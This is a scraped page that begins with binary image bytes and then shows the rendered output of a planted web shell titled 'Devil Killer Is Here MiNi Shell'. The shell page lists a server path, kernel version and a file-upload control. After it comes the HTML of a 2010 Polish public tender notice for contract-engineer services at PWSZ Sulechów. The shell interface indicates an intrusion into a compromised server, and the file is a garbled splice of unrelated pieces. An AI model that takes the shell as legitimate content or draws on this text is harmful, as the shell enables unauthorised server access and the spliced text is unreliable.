JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101126/339555-N-2010.html

<p class="kh_header"><b>Sulechów: Świadczenie usługi Inżyniera Kontraktu dla PWSZ w Sulechowie w ramach Projektu współfinansowanego ze środków UE, pn.: Lubuski Ośrodek Innowacji i Wdrożeń Agrotechnicznych w Kalsku</b><br>
<b>Numer ogłoszenia: 339555 - 2010; data zamieszczenia: 26.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa w Sulechowie , ul. Armii Krajowej 51, 66-100 Sulechów, woj. lubuskie, tel. 068 3528300, faks 068 3528303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwsz.sulechow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi Inżyniera Kontraktu dla PWSZ w Sulechowie w ramach Projektu współfinansowanego ze środków UE, pn.: Lubuski Ośrodek Innowacji i Wdrożeń Agrotechnicznych w Kalsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie obowiązków Inżyniera Kontraktu - inwestora zastępczego, zwanego dalej Wykonawcą, obejmujące zarządzanie, nadzór inwestorski i rozliczanie pozyskanych środków realizowanego przez PWSZ w Sulechowie zwanego dalej Zamawiającym, zadania inwestycyjnego w ramach Projektu współfinansowanego ze środków UE, pn.: Lubuski Ośrodek Innowacji i Wdrożeń Agrotechnicznych w Kalsku. Zadanie współfinansowane jest ze środków Unii Europejskiej z Programu Operacyjnego: Lubuski Regionalny Program Operacyjny na lata 2007-2013  Priorytet: 2. Stymulowanie wzrostu inwestycji w przedsiębiorstwach i wzmocnienie potencjału innowacyjnego. Działanie 2.4 Transfer badań, nowoczesnych technologii i innowacji ze świata nauki do przedsiębiorstw..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.24.80.00-8, 71.52.00.00-9, 71.54.00.00-5, 71.63.10.00-0, 71.63.13.00-3, 71.31.00.00-4, 71.52.10.00-6, 79.99.40.00-8, 72.51.20.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości: 5.000,00 zł (słownie:  pięćtysięcyzłotych 00/100)
Wykonawca wnosi wadium w :
1. pieniądzu na konto Zamawiającego: Kredyt Bank S. A. O/Zielona Góra Filia 3 Sulechów nr 17150018101218100275580000
2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3. gwarancjach bankowych;
4. gwarancjach ubezpieczeniowych;
5. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z póź. zm.).
przed upływem terminu składania ofert. 

Poręczenia oraz gwarancje (w oryginale), o których mowa wyżej, winny być ważne przez okres związania ofertą i jeżeli mają być zwrócone po tym okresie, nie mogą być trwale wpięte do oferty. Do oferty należy wówczas dołączyć potwierdzoną za zgodność z oryginałem ich kserokopię a oryginał umieścić w oddzielnej kopercie i dołączyć do oferty.
Wadium w pieniądzu należy wnieść na konto Kredyt Bank S.A O/ Zielona Góra Filia 3 Sulechów  17 1500 1810 1218 1002 7558 0000 z dopiskiem Wadium - postępowanie Nr: ZP.2390- 61/10/K.TI
Wadium wniesione w pieniądzu będzie przechowywane na w/w rachunku bankowym. 
Potwierdzeniem tej formy wniesienia wadium będzie kopia przelewu załączona do oferty.
Należy podać również nr konta, na które Zamawiający winien dokonać zwrotu wadium.
Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego do zapłaty kwoty wadium, następuje jego bezwarunkowa wypłata w okolicznościach wymienionych w art. 46 ust. 5 oraz ust. 4a ustawy Pzp.
Wykonawcy, których oferty nie będą zabezpieczone odpowiednią formą wadium zostaną wykluczeni z postępowania na podstawie art. 24 ust. 2 pkt 2.
Zasady utraty, zwrotu oraz ponownego wnoszenia wadium reguluje art. 46 Ustawy - Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek oceniany zgodnie z kryterium spełnia/ nie spełnia po analizie oświadczeń i dokumentów załaczonych do oferty. Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków poprzez weryfikację oświadczenia złożonego na podstawie art. 44 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek oceniany zgodnie z kryterium spełnia/ nie spełnia po analizie oświadczeń i dokumentów załaczonych przez Wykonawcę, tj.: wykażą się, że  zrealizowali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z należyta starannością co najmniej 3 inwestycje, odpowiadające swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, tj. zakończył i rozliczył realizację co najmniej 3 (trzy) usługi polegające na świadczeniu usługi Inżyniera Kontraktu dla inwestycji polegającej na budowie nowego obiektu budowlanego  o kubaturze nie mniejszej niż 6000 m3 i wartości większej lub równej kwocie 10.000.000 zł każda, z podaniem ich rodzaju i wartości, przedmiotu, dat i miejsca wykonania - w tym:
- co najmniej jedną inwestycję zakończoną zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone
- co najmniej dwie inwestycje współfinansowane ze środków unijnych, zakończoną zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Wzór wykazu wykonywanych usług stanowi załącznik nr  6 do siwz.
Wykonawca zobowiązany jest załączyć dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek oceniany zgodnie z kryterium spełnia/ nie spełnia po analizie oświadczeń i dokumentów załaczonych do oferty. Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków poprzez weryfikację oświadczenia złożonego na podstawie art. 44 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek oceniany zgodnie z kryterium spełnia/ nie spełnia po analizie oświadczeń i dokumentów załaczonych przez Wykonawcę, tj.: wykażą, że  dysponują osobami posiadającymi odpowiednie kwalifikacje zawodowe i doświadczenie niezbędne do wykonania zamówienia zgodnie z wymogami przedstawionymi w siwz, wraz ze wskazaniem osób do uczestnictwa w wykonaniu poszczególnych zadań, łącznie z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i posiadanych uprawnień:
a) dysponują osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób posiadających stosowne uprawnienia w następujących branżach:
1. Osoba wyznaczona na Kierownika Zespołu powinna posiadać: wykształcenie techniczne, minimum 5 lat doświadczenia zawodowego w kierowaniu zespołem ludzi, prowadzącym nadzór nad inwestycjami budowlanymi lub realizującymi roboty budowlane, pełniącej funkcje Kierownika Zespołu, Inżyniera Kontraktu, Inżyniera Rezydenta lub Przedstawiciela Wykonawcy, znajomość języka polskiego w stopniu umożliwiającym swobodną komunikację w mowie i piśmie
2. Osoba wyznaczona na Inspektora Nadzoru robót budowlanych - specjalista w zakresie robót konstrukcyjno - budowlanych powinna posiadać: wykształcenie techniczne, uprawnienia budowlane do kierowania i nadzorowania robót w specjalności konstrukcyjno-budowlanej, przynależność do Okręgowej Izby Inżynierów Budownictwa, doświadczenie minimum 5-letnie jako inspektor nadzoru lub minimum 2 lata jako inspektor nadzoru i 3 lata jako kierownik budowy. 
3 Osoba wyznaczona na  Inspektora Nadzoru - specjalista w zakresie robót instalacji i sieci sanitarnych powinna posiadać:  wykształcenie techniczne, uprawnienia budowlane do kierowania i nadzorowania robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń, przynależność do Okręgowej Izby Inżynierów Budownictwa, doświadczenie minimum 5-letnie jako inspektor nadzoru lub minimum 2 lata jako inspektor nadzoru i 3 lata jako kierownik budowy.
4. Osoba wyznaczona na Inspektora Nadzoru - specjalista w zakresie sieci, instalacji i urządzeń elektroenergetycznych oraz Aparatury Kontrolno - Pomiarowej i Automatyki (AKPiA) powinna posiadać na  wykształcenie techniczne, uprawnienia budowlane do kierowania i nadzorowania robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, Przynależność do Okręgowej Izby Inżynierów Budownictwa, Doświadczenie minimum 5-letnie jako inspektor nadzoru lub minimum 2 lata jako inspektor nadzoru i 3 lata jako kierownik budowy, w tym realizacji co najmniej jednej inwestycji budowlanej polegającej na budowie zewnętrznych sieci, instalacji i urządzeń elektrycznych lub elektroenergetycznych.
5. Osoba wyznaczona na Inspektora Nadzoru - specjalista w zakresie robót drogowych powinna posiadać: wykształcenie techniczne, uprawnienia budowlane do kierowania i nadzorowania robót w specjalności drogowej, przynależność do Okręgowej Izby Inżynierów Budownictwa, doświadczenie minimum 5-letnie jako inspektor nadzoru lub minimum 2 lata jako inspektor nadzoru i 3 lata jako kierownik budowy.
6. Osoba wyznaczona na  Specjalistę ds. Rozliczeń środków unijnych powinna posiadać: wykształcenie wyższe techniczne lub ekonomiczne, minimum 3-letnia praktyka w zakresie rozliczenia inwestycji budowlanych, w tym inwestycji współfinansowanych z funduszy Unii Europejskiej, praktyka na stanowisku Specjalisty ds. Rozliczeń lub równoważnym, w tym udokumentowane doświadczenie w zakresie administracji, zarządzania i rachunkowości, w tym rozliczania co najmniej dwóch projektów współfinansowanych ze środków unijnych, znajomość języka polskiego w stopniu umożliwiającym swobodną komunikację w mowie i piśmie.
7. Osoba wyznaczona na Specjalistę ds. zamówień publicznych powinna posiadać: wykształcenie wyższe techniczne lub ekonomiczne, co najmniej 3-letnie doświadczeniem w przygotowywaniu i przeprowadzeniu procedur udzielania zamówień publicznych, tj.: udokumentowane doświadczenie w okresie ostatnich trzech lat w zakresie przygotowania z należyta starannością minimum 5 (pięć) dokumentacji przetargowych w oparciu o ustawą Prawo zamówień publicznych, w tym co najmniej 2 (dwóch) dokumentacji przetargowych na roboty budowlane zakończonych podpisaniem (dwóch) umów.
8. Osoba wyznaczona na Specjalistę - kosztorysanta powinna posiadać: wykształcenie techniczne, minimum 3 lat praktyki w pracy na stanowisku kosztorysanta przy wykonywaniu obmiarów, kosztorysów z Przedmiarów Robót w pracach budowlanych, zestawień kosztów, kontroli kosztów robót oraz weryfikacji powykonawczej robót w branży wodno - kanalizacyjnej, budowlanej, elektrycznej i AKPiA, technologicznej, znajomość języka polskiego w stopniu umożliwiającym swobodną komunikację w mowie i piśmie.
9. osoba wyznaczona na Specjalistę - technologa powinna posiadać: wykształcenie wyższe (mgr, inż., mgr inz.), kierunkowe w zakresie technologii żywności, referencje potwierdzające doświadczenie zawodowe tj. w ciągu ostatnich 5 lat, minimum 1 rok pracy na stanowisku technologa lub innym w charakterze specjalisty, zapewniającym czynny kontakt z odpowiednimi przepisami sanitarnymi oraz rozwiązaniami technicznymi stosowanymi w zakładach przetwórstwa artykułów rolno-spożywczych, znajomość języka polskiego w stopniu umożliwiającym swobodną komunikację w mowie i piśmie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek oceniany zgodnie z kryterium spełnia/ nie spełnia po analizie oświadczeń i dokumentów załaczonych do oferty. Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków poprzez weryfikację oświadczenia złożonego na podstawie art. 44 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pełnomocnictwo (w sytuacji, gdy ofertę podpisuje osoba, której prawo do reprezentowania firmy nie wynika z dokumentu rejestrowego). 2. Oferta składana przez spółkę cywilną poza wyżej wymienionymi dokumentami winna dodatkowo zawierać następujące dokumenty dotyczące każdego ze wspólników tej spółki: a) odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, b) kserokopię umowy spółki cywilnej - jeżeli oferta nie jest podpisywana przez wszystkich wspólników tworzących spółkę. 
6.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany Umowy są dopuszczalne w przypadkach wskazanych w SIWZ, tj.:
1.  Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie oraz wzorem umowy (załącznik nr 2 i załącznik nr 9 do siwz).
2. Umowa jest nieważna w części wykraczającej poza określenie przedmiotu zamówienia zawarte w  specyfikacji istotnych warunków zamówienia.
3.  Wykonawcy składający ofertę wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. 
4.	Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba że zamawiający przewiduje możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany. (zgodnie z art. 144 ustawy Pzp).
5. Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie zmiany formy zabezpieczenia umowy. Zmiana przewidziana w art. 149 ust. 1 Pzp. 
6. Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie zmiany podwykonawców w przypadku:
1)  wprowadzenia nowego podwykonawcy,
2)  rezygnacji podwykonawcy,
3)  zmiany wartości lub zakresu usług wykonywanych przez podwykonawców, zamawiający może wyrazić zgodę na powyższe, po pisemnym zaakceptowaniu umowy Wykonawcy z podwykonawcą w terminie 14 dni od przekazania tej umowy przez wykonawcę.
7. Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie zmiany inspektorów nadzoru w przypadku:
1) śmierci, choroby, rezygnacji, zwolnienia pracownika lub innych zdarzeń losowych dotyczących inspektorów nadzoru,
2)  zastrzeżeń jednej ze stron co do kompetencji inspektora nadzoru.

8. W przypadku zmiany inspektorów nadzoru nowy inspektor nadzoru musi spełniać wymagania określone w SIWZ dla danego specjalisty.
9. Zmiany Umowy mogą również nastąpić, co najmniej w przypadku wystąpienia jednej z poniższych okoliczności:
a) ograniczenie zakresu prac, w tym robót budowlanych, wynikające z braku środków finansowych, 
b) konieczność zmiany terminu realizacji Umowy na roboty budowlane, w przypadku wystąpienia tzw. siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności, warunków atmosferycznych uniemożliwiających zachowanie technologii wykonania robót, a także w przypadku wystąpienia robót dodatkowych koniecznych do wykonania podstawowego zakresu zadania oraz konieczności wprowadzenia zmian w dokumentacji projektowej, a także w przypadku niezawinionego wydłużenia postępowania administracyjnego lub innego postępowania, obejmującego uzyskanie niezbędnych do realizacji celu Inwestycji decyzji, zezwoleń i uzgodnień oraz środków finansowych, bądź innych nie dających się przewidzieć zjawisk, w tym  hydrologicznych pojawiających się w trakcie budowy, a także innych nieprzewidzianych okoliczności jak np. odkrywki archeologiczne, odkrycie niewybuchu, itp., co może spowodować konieczność przedłużenia terminu wykonania Umowy,
c) z przyczyn leżących po stronie Zamawiającego, wynikających ze zmiany stosunków społeczno-gospodarczych lub z innych powodów wystąpi konieczność zmiany terminu, zakresu, bądź innych zapisów, bez zmiany których realizacja Umowy będzie utrudniona, niemożliwa lub narazi Zamawiającego na szkodę,
